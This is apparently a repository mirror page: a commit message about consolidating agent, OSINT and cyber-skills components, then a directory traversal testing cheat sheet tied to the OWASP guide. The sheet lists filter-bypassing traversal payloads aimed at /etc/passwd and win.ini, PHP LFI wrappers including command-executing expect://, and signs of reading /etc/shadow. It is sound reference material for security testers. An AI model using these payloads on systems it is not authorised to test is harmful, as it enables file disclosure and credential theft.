mirror of
https://github.com/SHOGGOTH-SECTOR/sica-fondt.git
synced 2026-08-01 16:40:24 +00:00
Place useful parts of the surrounding repos into sica-fondt by layer, per the
body model (Ada = membrane; brain/endocrine/capabilities/knowledge non-Ada):
- brain/ LLM reasoning + providers (dapr, hermes, MoMoA)
- capabilities/ REPRAG sidecars: hermes tools/skills, dapr tools, parallel
dispatch, A51 channels, and the OSINT cluster
- knowledge/ LORAG corpus: 754 cyber-skills, agency personas, secure-coding,
MITRE ATT&CK data
- reference/ defensive threat-reference (C3, shhbruh doc) + AdaYaml parser
License handling: AGPL sources (worldosint, advanced_evolution, mercury,
Reticulum) and GPL DeTTECT are SPEC-only clean-room/port descriptions — no
copyleft code copied. MIT/Apache/data parts copied as working trees.
Safety: shhbruh escape/persistence material and C3 covert-C2 kept as reference
only, not wired into the running organism. See CONSOLIDATION.md.
https://claude.ai/code/session_01UehUqEXXJJCsHoA4voCU5c
2.1 KiB
2.1 KiB
API Reference: Performing Directory Traversal Testing
Traversal Payload Encodings
| Encoding | Example | Description |
|---|---|---|
| Plain | ../../../etc/passwd |
Standard Unix traversal |
| URL-encoded | ..%2f..%2f..%2fetc%2fpasswd |
Single URL encoding |
| Double-encoded | ..%252f..%252f |
Bypass WAF single-decode |
| UTF-8 overlong | ..%c0%af..%c0%af |
Bypass charset-based filters |
| Backslash (Windows) | ..\\..\\..\\windows\\win.ini |
Windows path traversal |
| Mixed separators | ..././..././ |
Bypass recursive stripping |
PHP Wrapper Protocols (LFI)
| Wrapper | Description |
|---|---|
php://filter/convert.base64-encode/resource= |
Read file as base64 |
php://input |
Read from POST body |
expect:// |
Execute system command |
data://text/plain;base64, |
Inline data injection |
file:/// |
Direct file access |
Vulnerability Indicators
| File | Content Indicator |
|---|---|
/etc/passwd |
root:x:0:0: |
win.ini |
[fonts], [extensions] |
/proc/self/environ |
Environment variables |
/etc/shadow |
Hashed passwords (critical) |
requests Library
| Method | Description |
|---|---|
requests.get(url, allow_redirects=False) |
Send traversal payload |
urllib.parse.urlencode(params) |
Encode parameters with payloads |
urllib.parse.urlparse(url) |
Parse URL to extract parameters |
Key Libraries
- requests (
pip install requests): HTTP client for payload delivery - urllib.parse (stdlib): URL parsing and parameter manipulation
OWASP Testing Guide
| Test ID | Description |
|---|---|
| WSTG-ATHZ-01 | Testing for Directory Traversal / File Include |